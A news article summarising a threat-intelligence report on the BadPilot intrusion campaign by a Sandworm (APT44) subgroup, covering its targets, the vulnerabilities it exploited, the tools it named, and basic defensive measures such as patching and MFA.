BadPilot cyberattacks have been fueling Russian hacker operations for years. A subgroup of the state-sponsored hacking group APT44, also called Sandworm, has been launching widespread network intrusions. According to a recent report, this group focuses on breaching critical infrastructure, including energy, telecommunications, and defense sectors.
The hacking campaign has been active since at least 2021. Its primary goal is to gain initial access to target networks, establish long-term persistence, and then allow other APT44 subgroups to carry out destructive attacks.
Expanding Target Regions
Initially, the BadPilot hacking campaign focused on Ukraine, Europe, Central and South Asia, and the Middle East. However, after Russia’s invasion of Ukraine in 2022, these attacks intensified. The hackers specifically targeted government agencies, military networks, and logistics operations.
By 2023, the group expanded its reach to Europe, the United States, and the Middle East. In 2024, it increased focus on the U.S., U.K., Canada, and Australia. These attacks have already compromised major organizations across multiple regions.
Hacking Techniques and Exploited Vulnerabilities
The APT44 subgroup uses various methods to breach networks. They exploit known software vulnerabilities, steal credentials, and execute supply chain attacks. Some of the key vulnerabilities they have targeted include:
- Microsoft Exchange (CVE-2021-34473)
- Zimbra Collaboration Suite (CVE-2022-41352)
- JetBrains TeamCity (CVE-2023-42793)
- Microsoft Outlook (CVE-2023-23397)
- ConnectWise ScreenConnect (CVE-2024-1709)
Once inside a system, hackers install backdoors, deploy web shells, and use remote access tools like Atera Agent and Splashtop to evade detection. They also steal credentials through Procdump or Windows registry manipulation and exfiltrate data using Rclone, Chisel, and Plink.
In 2024, researchers uncovered a new evasion technique. Hackers began routing traffic through the Tor network, making their activity nearly invisible to security defenses.
How to Protect Against BadPilot Attacks
Organizations can defend against BadPilot cyberattacks by applying security patches for known vulnerabilities. Implementing multi-factor authentication (MFA) can also prevent credential theft. Additionally, monitoring for unusual network activity and blocking unauthorized remote access tools can help reduce risks. Security teams should also limit administrative privileges and enforce strict access controls to minimize damage in case of a breach.
